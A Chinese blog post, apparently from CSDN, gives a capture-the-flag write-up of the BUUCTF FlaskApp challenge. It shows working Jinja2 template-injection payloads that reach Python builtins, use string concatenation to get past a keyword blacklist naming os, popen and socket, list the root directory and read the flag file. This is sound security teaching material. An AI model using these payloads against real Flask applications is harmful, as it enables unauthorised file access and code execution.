web buuctf [GYCTF2020]FlaskApp

最新推荐文章于 2025-02-25 12:54:48 发布
最新推荐文章于 2025-02-25 12:54:48 发布
阅读量4.5k 收藏 6
点赞数 2
文章标签: flask flask之debug模式漏洞 flask字符拼接
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44214568/article/details/124125565
版权

知识点:1.flask的debug模式漏洞

              2.flask字符拼接漏洞

1.开题

2.提示flask了,那不得不试一试SSTI

在加密内输入{{7*7}} ,生成base64码e3s3Kjd9fcKg; 将e3s3Kjd9fcKg输入到解码框内,显示no no no说明存在防御

换一个输入{{7+7}},base64码为e3s3Kzd9fQ==,解码后,显示的是14

综上存在SSTI

3.看提示页面,没啥东西,在解密页面(因为解密存在SSTI)再随便输入些字母,看到报错信息,网站打开了flask的debug模式,在debug页面中我们可以看到后台的路径和源码信息

有文件的名字,路径,出错的方法名等信息

我们查看一下decode方法

 render_template属于jinja2的模板函数。render_template_string则是用来渲染一个字符串的。SSTI与这个方法密不可分。

可参考学习:Python-模板注入_jinqipiaopiao的博客-优快云博客

4.关于jinja2

关于Flask SSTI,解锁你不知道的新姿势 - SecPulse.COM | 安全脉搏

需要用到的知识:

jinja2一共三种语法:
控制结构 {% %}
变量取值 {{ }}
注释 {# #}

jinja2的Python模板解释器在构建的时候考虑到了安全问题,删除了大部分敏感函数,相当于构建了一个沙箱环境。但是一些内置函数和属性还是依然可以使用,而Flask的SSTI就是利用这些内置函数和属性相互组建来达到调用函数的目的,从而绕过沙箱。

__class__         返回调用的参数类型
__bases__         返回基类列表
__mro__           此属性是在方法解析期间寻找基类时的参考类元组
__subclasses__()  返回子类的列表
__globals__       以字典的形式返回函数所在的全局命名空间所定义的全局变  量 与 func_globals 等价
__builtins__      内建模块的引用,在任何地方都是可见的(包括全局),每个 Python 脚本都会自动加载,这个模块包括了很多强大的 built-in 函数,例如eval, exec, open等等

看到源码里面有waf绕过,我们看一下文件的源码

{% for c in [].__class__.__base__.__subclasses__() %}
   {% if c.__name__=='catch_warnings' %}
    {{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
   {% endif %}
{% endfor %}

payload:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

先加密,再扔到解密里,

 关于waf的代码如下:

def waf(str):
      black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"]
  for x in black_list :
      if x in str.lower() :
      return 1

过滤了flag,os,system,popen,eval等

不过这倒不同担心,这个有一个典型的漏洞,就是字符串拼接漏洞

 先查看一下当前的目录

for c in __class__.__base__.__subclass__()
    if c.__name__ = 'catch_warnings'
       c.__init__.__globals__.['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')
    end if
end for

整理后payload:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

解得:

同样得,构造payload:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}

 解得:

 flag{8d29f4dc-292a-4ff3-ac98-285d0a396a8e}

Python Flask的安全漏洞防范
Python编程之道的博客
04-03 1071
随着Web应用的广泛发展,Python Flask作为一个轻量级的Web框架,因其简洁易用、灵活高效的特点,被众多开发者所青睐。然而,由于Web应用面临着各种安全威胁,Flask应用也不例外。本文章的目的是深入探讨Python Flask应用中可能存在的安全漏洞,并提供相应的防范措施。范围涵盖了常见的安全漏洞类型,如SQL注入、XSS、CSRF等,以及针对这些漏洞的具体防范方法和代码示例。本文首先对Python Flask框架进行简要介绍,然后详细分析常见的安全漏洞类型及其原理和危害。
GYCTF2020 FlaskApp
汗的博客
09-04 1929
GYCTF2020 FlaskApp,老规矩,还是buu的平台 知识点 flask的SSTI ssti的绕过(拼接字符串,倒序切片,内置对象、函数) pin码的生成 信息收集 因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能 提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的 直接报错抛出debug信息,看来是开启了debug模式 参见该文章:Flask开启debug模式等于给黑客留了后门 而且读到了app.py的部分代码 大致的
[GYCTF2020]FlaskApp
missht0的博客
01-31 552
[GYCTF2020]FlaskApp 官方write up说看到根据hint1,失败乃成功之母,应该能想到flaskdebug模式debug模式的情况下可以抛出详细异常信息 base64解密界面随意输入字符串,导致解码报错 提示存在ssti注入 flask模板注入框架 查看根目录 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__glo
[GYCTF2020]FlaskApp 1(SSTI,PIN)
weixin_45577185的博客
10-20 1475
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
BUUCTF__web题解合集(九)
风过江南乱的博客
09-23 1194
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客大挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb
buuctf.web 32-64
m0_73889365的博客
02-18 911
buuctf.web 刷题
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3596
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
BUUCTF:[GYCTF2020]FlaskApp
末初 · mochu7
09-19 1655
BUUCTF:[GYCTF2020]FlaskApp Writeup
BUUCTF-[GYCTF2020]FlaskApp flask爆破pin
m0_64180167的博客
12-07 1152
这道题不需要爆破也可以getshellssti都给你了但是学习记录一下pin的获取首先就是通过base加密后 当base64解密的时候 会造成ssfr这里过滤了 * 所以使用 {{7+7}} 实现然后我们开始看看源代码可以发现HINT 下存在pin所以是找pin这里我们开始在解密随便输入内容报错了 然后我们可以看源代码这里可以发现没啥内容 但是有waf首先通过读取读取一下/etc/passwd。
[GYCTF2020]FlaskApp 1
ubaichu的博客
07-13 1121
[GYCTF2020]FlaskApp 1 详细解题过程
[GYCTF2020]FlaskApp1
2303_77961060的博客
05-09 426
在jinja2模板引擎当中存在下面几个模板,而在这些模板当中可以输入值以及一些控制语句,在jinja2引擎中有两个模板渲染函数,而SSTI注入的原因是由于。通过源代码的框架可以判断是FlaskFlask是使用python编写的一个轻量级的web应用框架,模板引擎使用的是jinja2,遵循MVC模型。可以看到返回有this_is_the_flag.txt,然后对其进行读取,构造。的不正确的使用以及没有对用户输入的数据进行有效的过滤导致的.构造{{config}},先加密,再把加密结果解密,结果输出。
BUU41 [GYCTF2020]FlaskApp1【SSTI】
最新发布
2401_86190146的博客
02-25 1028
题目:加密处没啥事,但是解密的地方提交{{7*7}}就会返回报错界面,顺便把代码也爆出来了先将字符串 text编码为字节对象,然后使用函数对这个字节对象进行 Base64 解码操作,报错的原因也就是解码没成功,将{{7*7}}进行base64编码后输入可能是过滤了{{ }} 把 {{ }} 去了还是nonono试试7+7,成功。。?具体流程:1.套模板,发现被过滤了字符,查看源代码2.列目录。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值